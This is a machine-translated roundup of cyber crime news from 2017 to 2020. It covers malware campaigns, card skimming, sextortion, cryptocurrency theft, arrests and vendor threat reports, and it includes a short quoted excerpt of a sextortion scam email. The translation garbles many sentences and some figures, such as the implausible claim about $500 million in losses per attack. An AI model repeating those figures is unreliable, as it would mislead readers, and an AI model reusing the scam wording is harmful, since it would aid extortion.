Translated by
2020/05/22 12:31:04

Cyber crime in the world

Cyber crime status in different regions of the world


Main article: Information security

Cyber wars between the countries

Information on agreements on electronic non-aggression and also on the cyber conflicts between the countries, is selected in the separate article:

Cyber crime in the commercial sector

Overview of events of cyber crime in banking sector is taken out in the separate article:

Losses of the organizations

The overview of losses of world economy from cyber crime in article:

Quotations of user data

The analysis of working conditions of hackers in article

Cyber attacks

Types of cyber attacks and overview of key events.


27% of the companies in the world faced cyber attacks to smartphones of employees

In 2019 27% of the companies in the world faced cyber attacks to smartphones of employees, data of the developer of solutions for information security of Check Point Software Technologies demonstrate.

Now we are witnesses of epidemic of mobile advertizing software – one of  the most common forms of cyberthreats aimed at  collecting of personal information from  the user's device. About 4 billion people  go online from  the smartphone.  Nevertheless, the companies seldom  safeguard mobile devices of employees, says Check Point.

About 27% of the companies in the world in 2019 faced cyber attacks to mobile devices of employees

The company notes that for theft of corporate data and penetration into network of the organization it is enough to malefactors to crack only one mobile device belonging to the worker. Mobile threats are constantly improved, and even more often swindlers use advertizing harmful tools. They show advertizing messages on  the smartphone and  is used by cybercriminals for  carrying out cyber attacks of the sixth generation, noted in Check Point.

 Experts give the malware Agent Smith which was detected in 2019 as one of examples of new mobile advertizing software. Then Agent Smith infected  about 25 million mobile devices  worldwide,  at the same time users  did not even notice it. The program imitated the Google application and  used all known vulnerabilities in  the Android system, automatically replacing installed applications with the versions containing a malicious code. Agent Smith also used resources of devices, displaying fake advertizing which could steal bank credentials and  listen to a talk.

Cybersecurity specialists recommend to download applications only from official directories, to regularly update OS and software in smartphones, not to allow applications to work in the background and to monitor access rights.[1]

Germany announced the international search of the Russian accused of cyber attacks to the Bundestag

At the beginning of May, 2020 the Prosecutor General's Office of Germany issued the warrant for the arrest of Dmitry Badin who is accused of cyber attacks to the Bundestag. the 29-year-old Russian is put on the international wanted list. Read more here.

1.3 thousand malware with the name of services of video conferences are revealed

In the middle of April, 2020 Kaspersky Lab announced identification about 1.3 thousand malware which mask under popular services for video conferences, including Zoom, Webex and Slack.

According to the Russian developer of antiviruses, by means of such scheme about 200 types of threats, generally advertisement supplements — DealPly and DownloadSponsor extend. Both softwares are installers which show advertizing or load advertizing modules.

The malware began to pretend to be more often services for online conferences

As a result of the attacks of such programs confidential information of the person without his consent can appear on servers of the third parties.

As declare in Kaspersky Labs, danger of advertizing software which imitates  names of services,  you should not underestimate. As a result of the attacks of such programs confidential information of the person without  his consent can appear on  servers of the third parties. And the amount of data which collect such programs is really various: preferences of users, the history of search, a geolocation and  many other things, explained in the company.

Platforms for  online conferences purchased great popularity in  the world now, use them in  the big and  small companies for  video conferencing,  ordinary users address them to communicate to  friends and  the family therefore  we cannot exclude that the number of harmful files which operate names of such services  will grow in the near future  — the expert in  security of Kaspersky Lab Denis Parinov commented.

As for popularity of this or that service at cybercriminals, shares were distributed so: on the first place of Zoom (42.42%), got the second WebEx (22.51%), the third — GoToMeeting (12.86%).

Besides, threats which hide under the guise of files with the.lnk expansion — labels to applications are detected. The vast majority of these files in practice was harmful elements which use vulnerabilities in different programs.[2]

As cybercriminals earn millions from a coronavirus

On March 13, 2020 the anti-virus company Eset issued the message about how cybercriminals profit on a coronavirus.

According to experts, malefactors extend news on behalf of the World Health Organization (WHO), urging users to follow malicious URLs for obtaining allegedly confidential and extremely important information on a virus. Thus, they abduct personal information and payment data, getting the access to accounts of the victims. Eset recommends to be more attentive and to check the address e-mail from which the message came: for example, the addresses, or have no relation to WHO.

Eset announced emergence of new cyberthreats in connection with spread of a coronavirus

Swindlers also resort to fake charity events, creating mailings with an appeal to send donation for search of vaccine against a coronavirus for children in China.

Besides, fraud with fake declarations of sale of medical masks and anti-septic tanks for hands gains popularity. With their help malefactors entice data of credit cards of users and abduct money from accounts. So, according to Sky News only in February, 2020 in Great Britain criminals earned not less than 800 thousand pounds sterling ($1 million) from a similar campaign.

Eset advises not to give in to panic moods in society and to be especially attentive to any resources and mailings containing mentioning of a coronavirus. It is necessary to be careful of the fraudulent charitable organizations or crowdfunding campaigns directed to fight against epidemic and also to ignore messages in which your personal or payment data are requested. One more measure of protection from cybercriminals — to apply complete anti-virus solutions with modules of protection of e-mail and function of protection against a phishing.[3]

In Indonesia the cybercriminals who infected hundreds of online stores worldwide are delayed

On January 27, 2020 it became known that cyberpolice of Indonesia together with the Interpol and Group-IB delayed the participants of criminal group who infected JavaScript-snifferami — a popular type of a malicious code — hundreds of online stores in Australia, Brazil, Great Britain, Germany, Indonesia, the USA and other countries of the world. Among the victims there are Russian and Ukrainian users. Criminals abducted data of bank cards at buyers and used them for purchase of gadgets and luxury goods. Liquidation of this criminal this group became the first successful transaction against operators JS снифферов in the Pacific Rim (APAC).

As it was reported, the joint transaction "Night Fury" of cyberpolice of Indonesia, INTERPOL’s ASEAN Cyber Capability Desk (ASEAN Desk) and department of investigations of Group-IB was carried out to APAC in December, 2019 — three residents of Indonesia aged from 23 up to 35 years were as a result arrested. Charges of theft of electronic data with the help of sniffers of GetBilling are brought to all of them. Transaction in 5 other regions of the Pacific Rim continues.

For the first time the family of sniffers GetBilling was described in the report of Group-IB "Crime without Punishment" in April, 2019. JavaScript-sniffera — a popular type of a malicious code which is used in attacks to online stores for theft personal and payment these buyers: numbers of bank cards, names, the addresses, logins, phone numbers and user data from payment systems. Specialists of Threat Intelligence Group-IB trace the GetBilling JS-sniffer family since 2018. The analysis of the infrastructure controlled by the GetBilling operators arrested in Indonesia showed that they managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America and some other countries.

In 2019 the command of department of investigations Group-IB managed to establish that a part of infrastructure of GetBilling was unrolled in Indonesia. INTERPOL’s ASEAN Desk quickly informed on it cyberpolice of Indonesia. In spite of the fact that operators of a sniffer GetBilling tried to hide the location, for example, for connection with the server for collecting of kidnapped persons of data and control over a sniffer criminals always used VPN, and for payment of services of a hosting and purchase of domains used only the stolen cards, experts of Group-IB together with local police officers managed to collect proofs that the group works from Indonesia, and then to trace suspects.

In the modern digital world cybercriminals very quickly implement advanced technologies to hide the illegal activity and to steal big arrays of personal data for the purpose of financial enrichment. To provide access of law enforcement agencies to information necessary for fight against cyber crime strong and fruitful partnership between police and information security experts is required.

Craig Jones, the director of investigation of cybercrimes told the INTERPOL

Example of a harmful script of GetBilling
This case obviously shows the international scope of cyber crime: operators JS сниффера lived in Indonesia, but attacked e - commerce - resources worldwide that complicated collecting of proofs, search of the victims and legal prosecution. However the international cooperation and data exchange can effectively help to counteract relevant cyberthreats. Thanks to prompt actions of the Indonesian cyberpolice and Interpol, "Night Fury" became the first successful international transaction against operators JavaScript-snifferov in APAC region. It is an example of the coordinated cross-border fight against cyber crime.

Vesta Matveeva, the head of department of investigations of incidents of information security of APAC Group-IB told

During a search police officers withdrew notebooks, mobile phones of different producers, processors, ID cards and bank cards from detainees. According to the investigation, the stolen payment data were used by suspects for purchase of gadgets and luxury goods which they then resold on the Indonesian websites below market value. Charges of theft of electronic data are already brought to suspects — according to the criminal code of Indonesia this crime is punished by imprisonment for up to ten years. Investigation continues.

Sexual racketing via smart cameras

In the middle of January, 2020 researchers sounded the alarm because of a wave of a new type of fraud — sexual racketing against the background of panic concerning security of smart cameras. Read more here.


Hackers attack gas stations and steal banking data of motorists

In the middle of December, 2019 Visa warned clients that several hackers began to attack gas stations by implementation of the malware in corporate networks to steal data of payment cards of motorists.

According to the report of Visa, hackers departed from an old technique of theft of banking data within which installed physical skimmers at gas stations. Analysts revealed two incidents when malefactors implemented the malware in directly corporate networks of dealers. Having got into IT infrastructure of retail chain stores, hackers got access to the vending machines containing not ciphered data of credit and debit cards. For spread of viruses hackers used e-mail of the companies, sending letters from false accounts.

Visa warned clients that several hackers began to attack gas stations by implementation of the malware in corporate networks to steal data of payment cards of motorists

Analysts of Visa noted that outlets selling fuel often are neglected basic technologies of security for data protection of cards, such as end-to-end enciphering or tokenization. Besides, in the report of Visa it is noted that many gas stations still rely on card acceptance devices with a magnetic band, but not the chip cards that increases risk of cracking.

Any business which accepts stores, processes and transfers data of payment cards, should conform to the PCI standards. However survey of Verizon conducted in December, 2019 among more than 300 organizations showed that only 37% from them constantly provide full observance of all security requirements.

One of the offered methods of fight against malefactors is segmentation of networks. She not only demands from hackers of bigger skill and time for penetration into the necessary part of network, but also creates detection points where defenders will be able to keep track of activity of the malefactor.[4]

The biggest hacker grouping in the history is declassified

At the beginning of December, 2019 the U.S. Department of the Treasury called Evil Corp company the largest hacker grouping in the history and stated that it is based in Moscow. Read more here

Steal data of credit cards from visitors

At the end of November, 2019 it became known of a series of cyber attacks which fell upon hotels worldwide. The actions hackers try to steal data of credit cards which are stored in IT systems of hotels and also travel agencies.

About a new harmful campaign from which not less than 20 representatives of hotel business in Brazil, Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey suffered, reported in Kaspersky Lab.

Cyber attacks which fell upon hotels worldwide

For collection of information from buffers of exchange, devices for printing and screenshots of documents malefactors use the Trojan programs of remote administration, extending them through harmful investments in Word, Excel, PDF in phishing letters. The letters imitating official requests for a group reservation from real people from the real companies look very convincingly, they include copies of white papers and detailed explanations of the reasons on which this hotel was selected. The only thing that issues counterfeit — spelling errors of the domain of the company.

Malefactors not only use remote access to the infected computers, but also sell it at illegal forums. Several cybergroupings among which — RevengeHotels and ProCC participate in a campaign.

According to service which was used for reduction of the malicious URL, it extended also in many other countries, except listed above, so, the volume of the compromised data can be much more.

Kaspersky Lab recommends to travelers to use for hotel booking through online travel agencies the virtual payment card, and for calculation on site either a virtual wallet, or the card with a limited number of money on the account.[5]

Belorus stole 630 thousand euros from banks and returned money bitcoins

On November 12, 2019 the Investigative Committee of Belarus announced investigation of criminal case about plunder of money from accounts of foreign banks. the 28-year-old resident of Grodno involved in crimes was arrested with assistance of the American FBI. Read more here.

School students arrange mass DDoS attacks

On November 11, 2019 Kaspersky Lab published results of a research which showed the 32 percent growth of number of DDoS attacks in the world according to the results of the third quarter of rather same period of the 2018th. Approximately the same surge in cyberattacks happened in comparison from the second quarter of 2019.

According to experts, school students were responsible almost for a half of DDoS attacks in the third quarter. At the same time Russia appeared among the leading countries where DDoS attacks on educational resources were detected.

Average duration of DDoS attacks, data of Kaspersky Lab

In the most rough afternoon in this respect for a reporting quarter it appeared on July 22. Then 467 DDoS attacks were recorded. It was the quietest on August 11 with 65 attacks.

Partly activation of DDoS-laymans in the third quarter led 2019 to the fact that for these three months the number of the "smart" attacks — technically more difficult and demanding from malefactors of bigger ingenuity, the study says was noticeably reduced.

Kaspersky Lab counted, in 2018–2019 academic year users more than 350 thousand times were attacked through electronic textbooks and papers. Specialists specify that similar viruses constitute big danger to the large companies, than to ordinary users, and note growth of hacker activity in the field of education around the world.

According to forecasts of the Russian producer of an antivirus, in the fourth quarter 2019 the number of the attacks for certain will grow again on the eve of holidays.

The shaft of the attacks on resources from the sector of education will stop by winter, however completely they will be left alone only by summer, with approach of vacation, experts are sure.

The business development manager of Kaspersky DDoS Protection in Russia Alexey Kiselyov says that he of DDoS attack is the second most popular type of the attacks on small and medium business.[6]

Officials are around the world attacked via WhatsApp

At the end of October, 2019 it became known of a large-scale attack of hackers on the high-ranking officials via WhatsApp worldwide. Cybercriminals used vulnerability of the messenger for gaining access to smartphones more than 1.4 thousand users. Read more here.

Fortinet 2019 Operational Technology Security Trends Report

  • In 2018 the number of the attacks aimed at the outdated software OT-sistem considerably grew
  • Cybercriminals exploit lack of the standardized protocol for OT networks
  • Attacks on OT systems are not differentiated on geographical or industry sign
  • 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus

Having analyzed data for 2018[7], researchers revealed a set of the attacks using IT networks (IT, directed, first of all, to industrial networks which software was not updated long ago. On the other hand, similar actions concerning IT systems are not effective any more. Besides, growth of number of the attacks directed to SCADA and ICS is observed.

Such threats are often aimed at the most vulnerable parts of OT networks and use the difficulties caused by lack of standardization of protocols. It is remarkable also that the similar attacks are not differentiated on geographical or industry sign – in 2018 growth in all directions and in all regions of the world was observed.

Experts of Fortinet also revealed a disturbing trend of increase in prevalence of exploits practically for each supplier of ICS/SCADA. In addition to attacks on not updated OT systems, 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus. Besides, cybercriminals also exploit a broad spectrum of the OT protocols which do not have the uniform standard and differing depending on functionality of a system, geography and the industry. It creates difficulties in development of solutions on security of OT systems for vendors worldwide.

In general the research showed that the risks connected with IT/OT convergence are quite real and should be perceived seriously by any organization which began to connect the industrial systems to IT networks. Malefactors will continue to use slower cycles of replacement and updating of technology at the enterprises. Such trend will probably remain for many years. The best method to resist to new threats – to accept and implement complex strategic approach which will simplify functioning of OT systems and involves all the experts who are available in the organization in the field of IT and OT.

Price of hacker cracking

Expenses from the hacker attacks pay off right after the first plunder, reported in a research of economy of hackers from Positive Technologies. The initial cost of the hacker attack on financial institutions will be  about 45-55 thousand dollars of the USA, specialists report in May, 2019.

About 2.5 thousand dollars of the USA are costed by a monthly subscription to service for creation of documents with a malware, tools on creation of harmful files cost 300 dollars, the source code of the program loader of a malware — from 1.5 thousand dollars, the program for operation of vulnerabilities for implementation — about 10 thousand dollars, legal tools which hackers can use, experts on the market estimated at 30–40 thousand dollars.

The most insignificant expenses go for mailing of malwares. So by the expert's estimates, they make about 1 thousand dollars a month.

The swindler enticed at Google and Facebook of $123 million

At the end of March, 2019 the U.S. Department of Justice took out charge to the citizen of Lithuania who enticed at Google and Facebook of $123 million. The swindler who pled guilty deceived the American companies using a compromise of corporate e-mail. Read more here.

Mass detentions of users of the shadow Internet

At the end of March, 2019 it became known of mass detentions of criminals which conducted the illegal activity on the shadow Internet. Read more here.

In numbers of tens of hotels built in mini-cameras. It was possible to spy upon guests for $50 a month

In the middle of March, 2019 it became known that in tens of hotels of South Korea mini-cameras were installed. Secret shooting 1600 about anything not suspecting tourists was broadcast live – it was possible to spy upon guests for $50 a month.

In general 30 hotels in ten cities of the country were involved in scandal; two offenders are already arrested, two more are under investigation. Cameras were hidden in boxes of digital television, wall jacks and holders for the hair dryer, and the finished shooting material was broadcast online, said in the statement of department of cyber-investigations of the National agency of police. On the website of broadcasting more than 4000 participants were registered, 97 of which paid for access to cameras monthly. According to police, during the period from November, 2018 to March, 2019 this service brought to violators more than $6000.

Clients of motels in South Korea wrote on the hidden cameras and broadcast video online

South Korea not for the first time comes up against a similar situation: in 2012 in police more than 2400 cases of illegal shootings, in 2017 already more than 6400 cases were registered, and this indicator grows. In 2018 tens of thousands of women took to the streets of Seoul and other cities in protest at similar violations under the slogan "My Life Not Your Porn!"

In reply Seol created special group of female inspectors who about 20,000 public toilets of the city for search of secret cameras carry out regular inspections. However, critics condemn this step as a superficial measure. Nevertheless, activity of police is not limited to it: in January, 2019 the co-owner of the South Korean pornwebsite was sentenced to four years of prison and undertook to pay a penalty in the amount of $1.26 million Soranet which was closed in 2018, was the popular website for loading of video and the photos made using the hidden cameras.[8]

Swindlers, being represented by technical support of Microsoft, set viruses

At the end of February, 2019 the owner of Devine Technical Services company Baljinder Singh who under the guise of technical support of Microsoft suggested users to eliminate viruses from computers was committed to prison, but actually set the malware for theft of money. Read more here.


Sex blackmail on the Internet gains popularity

In August, 2018 it became known of the method of racketing of money gaining popularity on the Internet. Cyberswindlers blackmail users with the fact that they will tell them to friends and relatives about viewing a porn.

Hackers send the e-mail in which they put the logins and passwords used by the victim which leak, most likely, occurred earlier. Authors of the message claim that they cracked the webcam and photographed as the person watches pornographic commercials and that does at this time. Then swindlers demand the redemption in bitcoins for that they did not send video which allegedly they have.

Hackers earned $0.5 million, blackmailing with the victims with the fact that will tell relatives about viewing a porn

In one of such letters the following was written:

I  know that it is your password. At first we  recorded video which you  watched ( you have a good taste, very ha), and  then made record from  your webcam (yes, that  place where you  are engaged in dirty affairs).

Hackers require to list $1400 for the bitcoin wallet within 24 hours in this message. As the proof they express readiness to send intimate video to several friends.

Users who are afraid of the soiled reputation, agree to requirements of swindlers.

As the CEO the engaged cyber security of Banbreach company Suman Kar told the Motherboard edition, swindlers with the minimum efforts could earn $500 thousand from such scheme, using old passwords.

Banbreach studied about 770 e-wallets which were specified by swindlers in messages about pornoblackmail. The majority (540) purses were empty, but in 230 more than 1 thousand transactions for the total amount of 71 bitcoins are noticed.[9]

Some malefactors find the victims in social networks and vebkam-chats, meet them on behalf of the attractive woman or the man and draw the user into straight talk which purpose is virtual sexual intercourse. As soon as criminals manage to imprint the victim on the camera or to receive a screenshot of intimate correspondence, they begin to blackmail her, threatening to publish video and photographic materials in open access. 

Cybercriminals stole about $1.2 billion in cryptocurrency

Since the beginning of 2017 cybercriminals stole about $1.2 billion in cryptocurrency. Such data contain in the report of the international non-profit organization Anti-Phishing Working Group (APWG). Excerpts from a research were published on May 24, 2018 by Reuters agency.

In an interview to the agency the chairman of APWG Dave Jevans who is also heading the CipherTrace company specializing in security issues in the field of cryptocurrencies said that theft of tokens by malefactors — a widespread problem, in addition to drug trafficking and money muling using cryptocurrencies.

Thefts of cryptocurrencies reached $1.2 billion since 2017

According to Dave Dzhevans, from the specified amount of $1.2 billion only about 20% or less that managed to be returned by forces of law enforcement authorities. According to him, law enforcement bodies are occupied with tracking of the malefactors involved in theft of digital money worldwide.[10]

The another large incident connected with cryptocurrency fraud became known in May, 2018. The Bloomberg agency announced the investigation begun in the USA concerning expected manipulations with a rate of bitcoin and other cryptocurrencies.

The U.S. Department of Justice finds out whether traders resorted to the illegal practicians affecting quotations such as spoofing. This term is understood as a market flood by fake requests with the purpose to push other traders to purchase or sale of cryptocurrency.

The Ministry of Justice cooperates in investigation with the Commission on future trade in raw materials (CFTC) which is a finance regulator of the market of derivatives for bitcoin.[11]

Earlier the Central Bank of the Russian Federation assessed the general damages from plunders in the world market of cryptocurrencies since the beginning of 2018. As the head of department of financial technologies of the Bank of Russia Alice Melnikova at the Moscow exchange forum which took place on April 10 reported, since the beginning of this year in the world 22 large fraudulent schemes using digital financial assets, cryptocurrencies were made. As a result malefactors stole about $1.36 billion in cryptocurrency, or $23 million a day. In January only from the Japanese exchange CoinCheck more than $420 million were displaid, Melnikova emphasized, referring to statistics which is available for the Central Bank.[12]

Technology agreement on cyber security (Cybersecurity Tech Accord)

On April 17, 2018 34 companies in the field of technologies and security signed the Technology agreement on cyber security (Cybersecurity Tech Accord) - the agreement between the group largest in the history, the clients undertaking to protect from malicious actions of cybercriminals worldwide. 34 signer companies were among ABB, Arm Cisco Facebook HP HPE, Microsoft Corp. Nokia, Oracle and Trend Micro. Jointly these enterprises represent creators and users of the technologies ensuring functioning of world communication and information infrastructure.

  • The increased protection - the Enterprises will create more powerful system of protection against cyber attacks. Within this undertaking of the company undertook to protect clients regardless of motives and the purposes of the online attacks worldwide.
  • Non-aggression - the Companies will not render assistance to the governments in drawing cyber attacks and will take measures for protection of the products and services from cracking or malicious use at all stages of technology development and distribution.
  • Capacity-building - the Enterprises will make additional efforts for support of developers, companies and private users of the technologies, helping them to expand the capability to self-defense. Such efforts can include joint development of new practical standards of security and new features which the companies will be able to implement in the products and services.
  • Collective actions - the Companies will develop the existing communications and to jointly create new formal and informal partnership with other industry members, civil society and research circles for the purpose of accumulation of scales of technical cooperation, identification of factors of vulnerability, conjoint analysis of risks and minimizing of a potentiality of emergence of malicious codes in a cyberspace.

Despite the fact that many signers observed all these principles before conclusion of an agreement, let and without advertizing it, this agreement represents a public joint liability to cooperate in questions of ensuring cyber security. The technology agreement remains open and for other signers from the private sector, regardless of scales or the specialization of their activity having high reputation, strict standards of cyber security and concordants unconditionally to observe the principles of the dokumnt.

The enterprises and the organizations of all scales become the victims of cyber attacks, and the economic damage from similar malicious actions by 2022 can reach 8 trillion US dollars[13]. Among other risks recent cyber attacks led to closing of small businesses, delays of the vital surgeries and failures in providing public services.

"The technology agreement will help to protect functional integrity of one trillion network devices which, according to our forecasts, will be put into operation for the next 20 years, - the chief consultant of Arm Carolyn Herzog noted. - The agreement integrates resources, experience and strategic practices of the major technology companies of the world, creating the strong base for users of technologies who will be able to take the extensive advantages from safer networked environment".

Signers of the Technology agreement on cyber security: ABB, Bitdefender, Cisco, ARM, BT, Cloudflare, Avast!, CA Technologies, DataStax, Dell, HPE, SAP, DocuSign, Intuit, Stripe, Facebook, Juniper Networks, Symantec, Fastly, LinkedIn, Telefonica, FireEye, Microsoft, Tenable, F-Secure, Nielsen, Trend Micro, GitHub, Nokia, VMware, Guardtime, Oracle, HP Inc., RSA

Technology agreement on cyber security (Cybersecurity Tech Accord). This document represents a public joint liability of 34 international companies of the world intending to protect and support civil society in the online environment and also to increase security, stability and stability of a cyberspace.

Microsoft Security Intelligence Report

The Microsoft corporation published in April, 2018 the report on threats of information security of Security Intelligence Report from February, 2017. It is based on the data obtained by protective programs and services of the company (Data on the number of the detected threats, but not about infection cases). Information was provided by corporate and private users who agreed to share it with a binding to a geolocation.

The report is devoted to three subjects: to botnets, popular methods of the hacker attacks and viruses racketeers. The purpose of the publication of the report is increase in awareness of corporate and private users on the existing threats and methods of counteraction to it.

Wide circulation of botnets and viruses racketeers led to the fact that the number of the devices in Russia which collided cyberthreats during the period from February, 2017 to January, 2018 reached 25-30% on average in a month whereas a similar indicator in the first quarter 2017 was almost twice less – 15%. The highest rates the lowest were recorded in Pakistan, Nepal, Bangladesh and Ukraine (33.2% or above), – in Finland, Denmark, Ireland and the USA (11.4% or below).

According to data of Windows Defender Security Intelligence, trojans became the most often found category of undesirable software. The percent of their distribution from February, 2017 to January, 2018 grew from 6% to 10%. Indicators of other types of the malware (dropper, obfuskator, viruses racketeers, etc.) made less than 1%.

In 2017 methods of receiving "easy mark", such as phishing, were used to obtain credentials and other confidential information from users. According to data of Microsoft Advanced Threat Protection (ATP) the phishing was among the most serious threats in mailboxes of users of Office 365 in the second half of the year 2017 (53%), 180-200 million phishing letters were detected monthly. In Russia, in particular, it was revealed 7.01 (in the world – 5.85) phishing sites per each 1000 hosts. Loaders malware (29%) and Java-backdoors (11%) became the threats following on prevalence.

Other target for malefactors are cloud applicaions with the low level of security. During the research it became clear that 79% of the SaaS-applications for cloud data storage and 86% of the SaaS-applications for joint work do not provide enciphering stored, the transmitted data. For protection of corporate infrastructure of the organization should limit use by users of the cloud applicaions which are not using enciphering and to control it using the broker of safety of cloud access (Cloud Access Security Broker, CASB).

One more trend of the second half of 2017 – cybercriminals use the legitimate built-in means of a system to distribute the infected document (for example, the document Microsoft Office) which is contained in the phishing letter and to load the program racketeer. By the best method to avoid such type of threat timely updating of the operating system and software is.

Cisco Annual Cybersecurity Report

The malware does not cease to be improved: today malefactors use cloud services and avoid detection using enciphering which helps to hide activity of a flow of commands and management. According to the 11th report of Cisco on cyber security (Cisco 2018 Annual Cybersecurity Report, [14]) to reduce time of detection of malefactors, cyber security specialists begin to apply more and more (and to buy) the means using the artificial intelligence (AI) and the machine self-training (MST).

On the one hand, enciphering helps to strengthen protection, with another — growth of volumes of both the legitimate, and harmful encoded traffic (50% as of October, 2017) multiplies problems for the potential threats and monitoring of their activity which are protected in the course of identification. For last 12 months specialists of Cisco in information security recorded more than triple growth of the encoded network traffic from the inspected malware samples.

Use of machine self-training helps to increase efficiency of protection of network and eventually will allow to reveal automatically non-standard patterns in the encoded web traffic, in cloud and IoT-Wednesdays. Some of 3600 Chiefs information security officer polled during preparation of the report of Cisco 2018 Security Capabilities Benchmark Study said that they trust such tools as MS and AI, and would like to use them, but they are disappointed a large number of false operations. MS and AI technologies which are in the beginning of the development now will be improved and will learn to define eventually "normal" activity of networks which monitoring they perform.

Some results of the report of Cisco 2018 Annual Cybersecurity Report

The financial damage from the attacks is more and more real

  • According to respondents, more than a half of all attacks caused financial damage of more than 500 million dollars, including including loss of income, outflow of customers, a lost profit and direct costs.

Attacks on supply chains become complicated and gather speed

  • Such attacks are capable to strike on a substantial scale computers, at the same time their action can continue months and even years. It is necessary to remember potential risks of use program and the hardware of the organizations which do not take seriously questions of information security.
  • In 2017 two similar attacks infected users with the Nyetya and Ccleaner viruses through entrusted software.
  • For reduction of risk of the attack on a supply chain it is necessary to review procedures of third parties for testing of efficiency of technologies of information security.

It becomes more difficult to protect, vulnerabilities become more various For the protection the organizations use complex combinations of products from different producers. Such complication at the extending variety of vulnerabilities has an adverse effect on capability of the organizations to reflection of the attack and leads including to increase in risks of financial losses.

  • In 2017 25% of specialists in information security reported that they use products from 11 — 20 vendors, in 2016 so answered 18%.
  • Information security specialists reported that 32% of vulnerabilities mentioned more than a half of systems, in 2016 so answered 15%.

Information security specialists estimated advantage of means of the behavioural analysis for identification of harmful objects

  • 92% of specialists consider that means of the behavioural analysis well cope with an assigned task.
  • 2/3 representatives of the health sector and representatives of the financial services industry consider behavioural analytics useful to identification of harmful objects.

Use of cloud computing grows; attacking use lack of advanced security protections

  • This year 27% of specialists in information security announced use of external private clouds (an indicator of 2016 — 20%).
  • From them 57% place network in a cloud for the sake of the best data protection, 48% — for the sake of scalability, 46% — for the sake of convenience of operation.
  • Though the cloud also ensures the increased data security, attacking use that the organizations not really well cope with protection of the developing and extending cloud configurations. The efficiency of protection of such configurations increases using a combination of the advanced techniques, such advanced security technologies as machine self-training, and such means of protecting of the first line as cloud platforms of information security.

Trends of growth of volumes of the malware and time of detection

  • The median time of detection shown to Cisco (time to detection, TTD) from November, 2016 till October, 2017 was about 4.6 hours. In November, 2015 this indicator was 39 hours, and according to the Report of Cisco on cyber security for 2017, median time of detection from November, 2015 till October, 2016 was 14 hours.
  • Cloud computing of information security support became a key factor for Cisco in the course of reduction of time of detection and its maintenance at a low level. The detection time is less, the attack is reflected quicker.

Additional recommendations for divisions of information security:

  • control of observance corporate the politician and the practician for updating of applications, systems and devices;
  • timely obtaining exact data on threats and existence of the processes allowing to use these data for security control;
  • carrying out profound and advanced analysis;
  • regular backup of data and verification of procedures of recovery — critical actions in the conditions of fast evolution of network programs racketeers and the destructive malware;
  • conducting check of safety of microservices, cloud services and administration systems of applications.

Charge of members of the group of Infraud

On February 7, 2018 the U.S. Department of Justice announced bringing charges to 36 persons entering into the cybercriminal  Infraud group whose activity caused damage to consumers, business and financial institutions for the amount more than $530 million. At the same time hackers intended to steal more than $2.2 billion Read more here.

The Internet is threatened by fragmentation because of cyber attacks

As a result of cross-border cyber attacks the Internet can break up to specific national and regional sites. It is reported in the report "Global risks – 2018", provided at the World Economic Forum (WEF) in Geneva.

Fragmentation of the Global network can lead to the termination of its functions and deceleration of technical progress. Development of the sphere of cyber security will help to prevent separation of the Internet into parts. According to authors of the report, the great value will play dialog between the governments and the technology companies in it.

According to the report, now more attention is paid to development of offensive, but not defensive opportunities in a cyberspace. Because of it there is "uncertainty fog at which the potential of the wrong calculations can cause a spiral of response punitive measures", – gives a fragment from the report TASS news agency. In turn, acceptance of response measures can cause chain reaction, authors note.

There is a probability that this source of cyber attack will be defined incorrectly and will be struck on the innocent purpose back. Then the purpose will also strike back, and the circle involved in a conflict of two sides will extend. As a result of attacks on the incorrect purposes not the cyber weapon can be even put to use physical, but.

Now use of conventional arms is regulated from a legal side, and it is necessary to develop similar standards in relation to conducting a cyber war, authors of the report are sure. Using such regulations it would be possible to prohibit the whole classes of a cyber weapon as it is made with chemical and biological weapons.

The clinic paid $55 thousand to cyberracketeers

At the beginning of January, 2018 the Hancock Health clinic in the American city of Grinfilde, Indiana, underwent the hacker attack using the SamSam virus encoder which paralyzed work of medical institution in the heat of a flu epidemic in the state. Quicker to recover data, the management of hospital paid racketeers the redemption in the amount of 4 bitcoins that at the time of payment made about $55 thousand Read more here.


Trends from PandaLabs

  • More than a half of the attacks is caused by the aspiration to draw from them a pecuniary benefit while espionage became the second pacing motivating factor.
  • The hidden attacks with adaptive horizontal movements become very widespread phenomenon.
  • Malefactors even more often began to perform the attacks without use of malware. They prefer to remain unnoticed for traditional models of protection, without demanding interaction with the victim. At optimal execution such attacks are capable to double the got profit.
  • Tools for operation of vulnerabilities generated new attack vectors which also do not require interaction with the victim.
  • The purpose – end devices. The perimeter became indistinct, the mobility is regulation practically for any company, and therefore corporate networks became more and more vulnerable.
  • Former employees of the enterprises try to blackmail the previous employers, initiating the attacks from within the companies.
  • Also in 2017 we observed more and more broad presence of the organized cyber-criminal groups, such as Lazarus Group attacking media, space and financial sectors and also objects of critical infrastructure in the USA and other countries of the world.
  • Cyber wars and cyber-armies: in a cyberspace the full-scale race of arms is observed, and many states create the command cyber-centers for increase in level of protection against the attacks directed to the companies and infrastructures.

Results of year and forecasts from Positive Technologies

The last year, according to experts of Positive Technologies, was remembered by the next events and trends:

  • Viruses racketeers. The lack of relevant updates and a habit to live with vulnerabilities led to a stop of the Renault plants in France, Honda and Nissan in Japan; banks, schools, energy, telecommunication companies suffered.
  • Practical security. Began to fight against paper security at the highest level. Federal law N 187-FZ "About security of critical information infrastructure of the Russian Federation" not just recommends, and obliges to be protected the state and business companies and enters mechanisms of performance monitoring of protective measures.
  • Vulnerabilities of a telecom began to use. Malefactors began to intercept codes for two-factor authentication using vulnerabilities of signal SS7 protocol. The first subscribers of O2 Telefonica suffered.
  • "Scalable" attacks on ATMs. ATMs plunder long ago and different methods, for example, tie to a rope of the car and take away. But when cybercriminals began to be connected to a local network of bank and far off to control a set of ATM, banks had a serious reason for concern.
  • Secret mining. In the spring of 2017 our experts detected hundreds of computers in the large companies which mined cryptocurrency for unknown hackers. The miner used the same vulnerability, as WannaCry, and protected the captured PCs from the encoder.
  • Enter through IoT. Noise around security of IoT because of botnets and DDoS attacks as using the unprotected "smart" coffee machines began to stop petroleum chemical plants did not manage to abate, and to use smart aquariums for attacks to casino.
